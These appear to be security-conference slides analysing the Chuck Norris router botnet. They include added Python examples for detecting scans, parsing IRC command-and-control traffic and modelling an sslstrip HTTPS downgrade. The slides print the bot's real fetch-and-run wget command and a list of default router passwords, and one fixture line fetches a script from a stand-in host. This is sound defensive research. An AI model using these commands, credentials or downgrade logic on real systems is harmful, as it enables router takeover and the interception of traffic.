Embedded Malware - An Analysis of the Chuck Norris Botnet

P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar
{celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz
Institute of Computer Science, Masaryk University

The sixth European Conference on Computer Network Defense - EC2ND
28-29 October 2010, Berlin, Germany

Part I - Botnet Discovery

Motivation
o Client-side anti-* protection is in use and well known.
o What could happen if the attacker targets the network infrastructure instead?

Network Monitoring at Masaryk University
[Figure: FlowMon probes on the network links generate NetFlow data; the NetFlow data is collected centrally and then analysed.]

Observed Attacks
o Worldwide TELNET scan attempts.
o Mostly coming from ADSL connections.

[Figure: screenshot of the NetFlow analysis console (detection plugins demoplugin, sshattack, p2pdetect, dos, smurf); the alert list below is reconstructed from it.]

Alerts, 14 December 2009 (destinations are hosts of the university network 147.251.0.0/16)
Time                     Protocol  Source IP         Destination IPs                                                      Dst port
2009-12-14 00:04:18.244  TCP       190.43.54.116     147.251.52.1, .10, .11, .12, .13, .22, .23, .26, .27, .28 and other 43 IPs   23
2009-12-14 00:04:18.253  TCP       190.43.54.116     147.251.52.2, .3, .4, .5, .6, .7, .8, .9, .15 and other 188 IPs              23
2009-12-14 00:08:13.738  TCP       87.16.90.222      147.251.94.1, .2, .3, .4, .5, .6, .7, .8, .9, .10 and other 237 IPs          23
2009-12-14 00:16:11.771  TCP       122.160.7.65      147.251.0.1, .2, .3, .4, .5, .6, .7, .8, .9, .10 and other 102 IPs           22
2009-12-14 00:14:36.584  TCP       190.232.138.125   147.251.64.1, .2, .3, .4, .5, .6, .7, .8, .9, .10 and other 241 IPs          23
Each source address contacts hundreds of hosts of a single /24 on the TELNET port 23 (one of them on the SSH port 22) within a few seconds: a horizontal scan by an infected device.

Part II - Chuck Norris Botnet

Chuck Norris Botnet in a Nutshell
o Linux malware - IRC bots with central C&C servers.
o Attacks poorly configured Linux MIPSEL devices.
o Vulnerable devices - ADSL modems and routers.
o Uses a TELNET brute-force attack as the infection vector.
o Users are not aware of the malicious activity.
o No anti-malware solution exists to detect it.
Discovered at Masaryk University on 2 December 2009.
The malware got the Chuck Norris moniker from a comment in its source code:
    [R]anger Killato : in nome di Chuck Norris !
(Italian: "in the name of Chuck Norris!")

Monitoring of the Botnet
o Botnet infiltration used from 12/2009 to 02/2010.
o An ASUS WL-500gP router served as the agent provocateur: a device we let the botnet infect so that its commands and traffic could be observed.
[Figure: monitoring setup built around the agent provocateur router.]

[Figure: the bot's list of class C networks to scan; Table 1 gives examples.]

Table 1: Example of botnet propagation targets.
IP Range          Owner                             IP Range          Owner
217.236.0.0/16    Deutsche Telekom                  88.253.0.0/16     TurkTelekom
87.22.0.0/16      Telecom Italia                    220.240.0.0/16    Comindico Australia
85.174.0.0/16     Volgograd Electro Svyaz           222.215.0.0/16    China Telecom
201.1.0.0/16      Telecomunicacoes de Sao Paulo     200.121.0.0/16    Telefonica del Peru
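The alerts in Part I are what the bot's class C sweeps of the Table 1 ranges look like from the victim network: one ADSL address opening a flow to hundreds of hosts of a /24 on TCP/23 within seconds. The following is an added example of that detection logic over NetFlow-style records; it is not code from the paper or from the FlowMon/NetFlow console shown on the slides. All flow records are constructed (two scanners modelled on the alert list plus benign SSH and web traffic), and the threshold and window values are assumptions.

```python
"""Horizontal TELNET/SSH scan detection over NetFlow-style records (added example)."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
import ipaddress


@dataclass(frozen=True)
class FlowRecord:
    start: datetime
    proto: str
    src: str
    dst: str
    dst_port: int
    packets: int


@dataclass(frozen=True)
class ScanAlert:
    src: str
    dst_port: int
    targets: int            # distinct destinations reached inside one window
    first_seen: datetime
    last_seen: datetime
    subnets: tuple          # /24 networks that were swept


def generate_sample_flows():
    """Constructed flows: two scanners plus benign background traffic."""
    base = datetime(2009, 12, 14, 0, 4, 18)
    flows = []
    # Scanner 1: a single SYN (1 packet, no reply) to 60 hosts of 147.251.52.0/24 on TCP/23, 100 ms apart.
    for i in range(1, 61):
        flows.append(FlowRecord(base + timedelta(milliseconds=100 * i), "TCP",
                                "190.43.54.116", f"147.251.52.{i}", 23, 1))
    # Scanner 2: 30 hosts of 147.251.0.0/24 on TCP/22, about twelve minutes later.
    for i in range(1, 31):
        flows.append(FlowRecord(base + timedelta(seconds=700, milliseconds=50 * i), "TCP",
                                "122.160.7.65", f"147.251.0.{i}", 22, 1))
    # Benign: an administrator opening SSH sessions to three servers over ten minutes.
    for i, minute in enumerate((0, 4, 9)):
        flows.append(FlowRecord(base + timedelta(minutes=minute), "TCP",
                                "147.251.3.10", f"147.251.5.{i + 1}", 22, 540))
    # Benign: a workstation talking to many web servers (port 80 is not a monitored port).
    for i in range(1, 41):
        flows.append(FlowRecord(base + timedelta(seconds=i), "TCP",
                                "147.251.7.21", f"93.184.216.{i}", 80, 12))
    return flows


def detect_horizontal_scans(flows, ports=(22, 23), min_targets=20,
                            window=timedelta(seconds=60)):
    """Flag (src, port) pairs that reach at least min_targets distinct destinations
    on a monitored port inside any window-long interval. A sliding window runs over
    the time-sorted flows of each source, so slow scanners spread over hours are
    not lumped together with a burst."""
    per_source = defaultdict(list)
    for f in flows:
        if f.proto == "TCP" and f.dst_port in ports:
            per_source[(f.src, f.dst_port)].append((f.start, f.dst))

    alerts = {}
    for (src, port), events in per_source.items():
        events.sort()
        live = Counter()            # destinations inside the current window
        best, lo = 0, 0
        for hi, (t, dst) in enumerate(events):
            live[dst] += 1
            while t - events[lo][0] > window:
                old = events[lo][1]
                live[old] -= 1
                if live[old] == 0:
                    del live[old]
                lo += 1
            best = max(best, len(live))
        if best >= min_targets:
            subnets = sorted({str(ipaddress.ip_network(f"{d}/24", strict=False))
                              for _, d in events})
            alerts[(src, port)] = ScanAlert(src, port, best, events[0][0],
                                            events[-1][0], tuple(subnets))
    return alerts


def format_alert(alert):
    """One line in the style of the console in Part I."""
    return (f"{alert.first_seen:%Y-%m-%d %H:%M:%S} TCP {alert.src} -> "
            f"{alert.targets} hosts in {', '.join(alert.subnets)} on port {alert.dst_port}")


if __name__ == "__main__":
    for alert in detect_horizontal_scans(generate_sample_flows()).values():
        print(format_alert(alert))
```

The administrator's three SSH sessions stay below the threshold even though they hit port 22, and the web browsing is never counted because port 80 is not monitored; real deployments tune `min_targets` and `window` per port against the site's baseline, since a single misconfigured monitoring host can otherwise look like a scanner.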
Infection and Propagation
[Figure: infection chain, reconstructed from the diagram.]
1. The infected device runs a TELNET dictionary attack against the victim (Table 2).
2. On success, the victim downloads the current bot version.
3. The bot denies remote access to the victim on ports 22-80.
4. The bot connects to the C&C (IRC) server and joins the channel ##soldiers##.
5. The channel topic carries the initial command (get scan-tools), which the bot executes.

Initial Command (IRC Topic):
    :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh

Table 2: Passwords used for the dictionary attack.
User    Passwords
root    admin, Admin, password, root, 1234, private, XA1bac0MX, adsl1234, %%fuckinside%%, dreambox, blank password
admin   admin, password, blank password
1234    1234

Botnet Threats
o Denial-of-Service attacks - DoS, DDoS.
o DNS spoofing attack.
o Infected device reconfiguration.

Consequences for Users
o The link is saturated with malicious traffic.
o Economic losses and criminal sanctions against unaware users.
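The bot takes its orders from the IRC channel topic, so the C&C side of an infection leaves a very recognisable trace: a TOPIC (or the 332 reply sent on join) whose text is a `!<target> <verb> <args>` command. The parser below is an added example for pulling those commands and their download URLs out of captured IRC traffic, such as what the agent provocateur sees; it is not the bot's code and not from the paper. Only the channel name ##soldiers## and the initial command above come from the slides; the command grammar is inferred from that one command, the IRC lines are constructed (nick, server name, the second topic and its URL are hypothetical), and treating PRIVMSG lines as a possible command carrier is an assumption.

```python
"""Extract bot commands and download IOCs from IRC C&C traffic (added example)."""
import re
from dataclasses import dataclass

# '!<target> <verb> [args]'; '!*' addresses every bot. Grammar inferred from the one command on the slides.
COMMAND_RE = re.compile(r"^!(?P<target>\S+)\s+(?P<verb>\w+)(?:\s+(?P<args>.*))?$")
URL_RE = re.compile(r"""https?://[^\s;'"<>]+""")


@dataclass(frozen=True)
class IrcMessage:
    prefix: str
    command: str
    params: tuple
    trailing: str


@dataclass(frozen=True)
class BotCommand:
    channel: str
    source: str        # "TOPIC" (TOPIC command or 332 reply) or "PRIVMSG"
    target: str
    verb: str
    shell: tuple       # ';'-separated shell commands when the verb is sh
    urls: tuple


def parse_irc_line(line):
    """RFC 1459 message: [':' prefix SPACE] command params [' :' trailing]."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if not params:
        raise ValueError("empty IRC message")
    return IrcMessage(prefix, params[0].upper(), tuple(params[1:]), trailing if sep else "")


def command_from_message(msg):
    """Return a BotCommand if the message carries a '!target verb args' command, else None."""
    if msg.command == "332" and len(msg.params) >= 2:       # RPL_TOPIC, sent when the bot joins
        channel, source = msg.params[1], "TOPIC"
    elif msg.command == "TOPIC" and msg.params:             # topic changed while the bot is in the channel
        channel, source = msg.params[0], "TOPIC"
    elif msg.command == "PRIVMSG" and msg.params:           # assumption: commands may also be sent as messages
        channel, source = msg.params[0], "PRIVMSG"
    else:
        return None
    # The slide prints the topic as ':!* sh ...'; the leading colon is the IRC trailing delimiter.
    m = COMMAND_RE.match(msg.trailing.strip().lstrip(":"))
    if not m:
        return None
    verb = m.group("verb").lower()
    args = m.group("args") or ""
    shell = tuple(c.strip() for c in args.split(";") if c.strip()) if verb == "sh" else ()
    return BotCommand(channel, source, m.group("target"), verb, shell, tuple(URL_RE.findall(args)))


def extract_commands(lines):
    parsed = (command_from_message(parse_irc_line(l)) for l in lines if l.strip())
    return [c for c in parsed if c]


def download_iocs(commands):
    """Sorted unique download URLs and their hosts, for blocking or hunting."""
    urls = sorted({u for c in commands for u in c.urls})
    hosts = sorted({re.match(r"https?://([^/:]+)", u).group(1) for u in urls})
    return urls, hosts


# Constructed C&C session as the agent provocateur would see it after joining the channel.
SAMPLE_SESSION = [
    ":irc.example.net 332 bot0001 ##soldiers## :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh",
    ":irc.example.net 366 bot0001 ##soldiers## :End of /NAMES list.",
    ":op!~op@203.0.113.9 PRIVMSG ##soldiers## :hi all",
    ":op!~op@203.0.113.9 TOPIC ##soldiers## :!* sh wget http://203.0.113.5/pwn/update.sh;sh update.sh",  # hypothetical
]

if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_SESSION):
        print(cmd.source, cmd.channel, cmd.verb, cmd.shell)
    print(download_iocs(extract_commands(SAMPLE_SESSION)))
```

Run over a capture from a device like the agent provocateur, the extracted hosts are the distribution servers worth blocking at the ISP edge; the same parser applied to flow-selected IRC sessions from the university border would flag infected customers by the channel name alone.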
DNS Spoofing Attack
o Web page redirect:
  o www.facebook.com
  o www.google.com
o Malicious code execution.
[Figure: the botnet C&C center reconfigures the infected router so that it no longer uses the ISP's primary and secondary DNS servers but OpenDNS.com resolvers whose answers the attacker controls; a client's request for www.facebook.com is then redirected to a page serving malicious code.]

Botnet Size and Evaluation - I
o Size estimation based on NetFlow data from Masaryk University.
o 33 000 unique attackers (infected devices) from 10/2009 to 02/2010.
[Figure: daily number of unique attackers from October 2009 to April 2010. Most infected ISPs: Telefonica del Peru, Global Village Telecom (Brazil), Turk Telecom, Pakistan Telecommunication Company, China Unicom Hebei Province Network.]

Unique attackers targeting the MU network (per day)
Month       Min    Max    Avg    Median
October       0    854    502    621
November     41    628    241    136
December     69   1321    366    325
January       9   1467    312    137
February    180   2004    670    560
Total         0   2004    414    354
Botnet stopped activity on 23 February 2010.

Botnet Size and Evaluation - II
[Figure only.]

Part III - Beyond Chuck Norris Botnet

Attacks on HTTPS using Chuck Norris Botnet - I
Features
o Our extension to the Chuck Norris botnet.
o Based on the MITM (Man-in-the-Middle) attack presented by Moxie Marlinspike at Black Hat DC (02/2009): sslstrip.
o The infected host operates as a transparent HTTP proxy.
o We don't attack HTTPS directly (that would produce invalid certificates).
Vulnerable Systems
o Any site providing an HTTP -> HTTPS redirect.
o Can't be detected on the web server side.
o No invalid certificates on the client side.

MITM attack using the sslstrip tool and an infected host
[Figure: message sequence between the user (86.49.xxx.yyy), the infected access point running sslstrip, and the web service https://mail.google.com.]
1. User -> access point: GET http://mail.google.com (plain HTTP).
2. Access point -> web service: the same GET, relayed unchanged.
3. Web service -> access point: HTTP 301 Moved Permanently, Location: https://mail.google.com.
4. Access point -> user: the 301 with the Location rewritten to http://mail.google.com.
5. User -> access point: GET http://mail.google.com, again in the clear.
6. Access point <-> web service: SSL Client hello / Server hello; the proxy fetches the page over TLS.
7. Web service -> access point -> user: HTTP 200 OK, delivered to the user over plain HTTP.
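The sequence above comes down to two rewrites by the infected access point: the Location header of the server's redirect, and every https:// link in the pages it relays, while the proxy itself keeps fetching those hosts over TLS. The model below is an added example of that logic, not code from the slides, from the bot or from sslstrip; the HTTP messages are constructed to follow the seven steps and no network traffic is sent. The HSTS part is an added caveat not on the slides: a browser that already knows the host from a Strict-Transport-Security header (RFC 6797) or a preload list upgrades the URL itself and never sends the plain-HTTP request the proxy needs, which is why the attack works on the first visit and not afterwards.

```python
"""sslstrip-style downgrade of an HTTP -> HTTPS redirect, modelled offline (added example)."""
import re
from urllib.parse import urlsplit, urlunsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
HTTPS_HOST_RE = re.compile(r"https://([^/\s\"'<>:]+)", re.IGNORECASE)


class SslStripProxy:
    """Transparent proxy on the infected access point: TLS on the upstream leg,
    plain HTTP towards the client, so the client never sees any certificate."""

    def __init__(self):
        self.stripped_hosts = set()   # hosts the client now reaches as http:// but the server serves as https://

    def upstream_url(self, host, path):
        scheme = "https" if host in self.stripped_hosts else "http"
        return urlunsplit((scheme, host, path, "", ""))

    def rewrite_response(self, status, headers, body):
        headers = dict(headers)
        location = headers.get("Location", "")
        if status in REDIRECT_STATUSES and location.lower().startswith("https://"):
            parts = urlsplit(location)
            self.stripped_hosts.add(parts.hostname)
            headers["Location"] = urlunsplit(("http",) + tuple(parts[1:]))
        for host in HTTPS_HOST_RE.findall(body):           # links inside HTML get the same treatment
            self.stripped_hosts.add(host.lower())
        body = re.sub(r"https://", "http://", body, flags=re.IGNORECASE)
        return status, headers, body


class Browser:
    """Minimal client model: remembers HSTS hosts and upgrades its own requests for them."""

    def __init__(self, known_hsts_hosts=()):
        self.hsts_hosts = set(known_hsts_hosts)   # e.g. a preload list

    def outgoing_url(self, url):
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.hsts_hosts:
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url

    def observe(self, host, headers, over_tls):
        # RFC 6797 section 8.1: an STS header received over insecure transport is ignored.
        if over_tls and "Strict-Transport-Security" in headers:
            self.hsts_hosts.add(host)


def web_service(scheme, path):
    """Constructed responses of the real server: redirect to https, then the page."""
    if scheme == "http":
        return 301, {"Location": "https://mail.google.com" + path}, ""
    return 200, {"Strict-Transport-Security": "max-age=31536000", "Content-Type": "text/html"}, \
        '<a href="https://mail.google.com/mail/">Inbox</a>'


def run_exchange(browser, proxy):
    """Play the seven steps; returns what the client ended up with."""
    host, path = "mail.google.com", "/"
    if browser.outgoing_url(f"http://{host}{path}").startswith("https://"):
        # HSTS already known: the browser opens TLS itself and the proxy only forwards ciphertext.
        return {"stripped": False, "client_scheme": "https", "location": None, "body": None}
    up = urlsplit(proxy.upstream_url(host, path))                      # steps 1-2
    status, headers, body = web_service(up.scheme, up.path)            # step 3: 301 to https://
    status, headers, body = proxy.rewrite_response(status, headers, body)
    location = headers["Location"]                                     # step 4: now http://
    second = urlsplit(browser.outgoing_url(location))                  # step 5: plain GET again
    up = urlsplit(proxy.upstream_url(second.hostname, second.path))    # step 6: proxy goes over TLS
    status, headers, body = web_service(up.scheme, up.path)
    status, headers, body = proxy.rewrite_response(status, headers, body)   # step 7: 200 OK in the clear
    browser.observe(second.hostname, headers, over_tls=False)
    return {"stripped": True, "client_scheme": "http", "location": location,
            "body": body, "upstream_scheme": up.scheme}


if __name__ == "__main__":
    print(run_exchange(Browser(), SslStripProxy()))
    print(run_exchange(Browser(known_hsts_hosts={"mail.google.com"}), SslStripProxy()))
```

Note the last step: the server's Strict-Transport-Security header does reach the client, but over plain HTTP, so a conforming browser discards it and the host stays unpinned for the next visit too; only a TLS connection the proxy did not mediate (or a preload entry) closes the window.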
Part IV - Conclusion

Botnet Timeline
o Compilation timestamp in the pnscan tool - 4 July 2008.
o First file uploaded to the distribution servers - 19 May 2009.
o Botnet discovery at Masaryk University - 2 December 2009.
o Botnet shutdown (hibernation) - 23 February 2010.

Botnet Summary
o There are no anti-* solutions for embedded/SOHO devices.
o The botnet is based on known techniques and components available on the Internet.
o Users are not aware of the attack or of the device infection.
o No response and no collaboration from the infected networks.

Pavel Čeleda et al., celeda@ics.muni.cz
Project CYBER, http://www.muni.cz/ics/cyber
Embedded Malware - An Analysis of the Chuck Norris Botnet
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.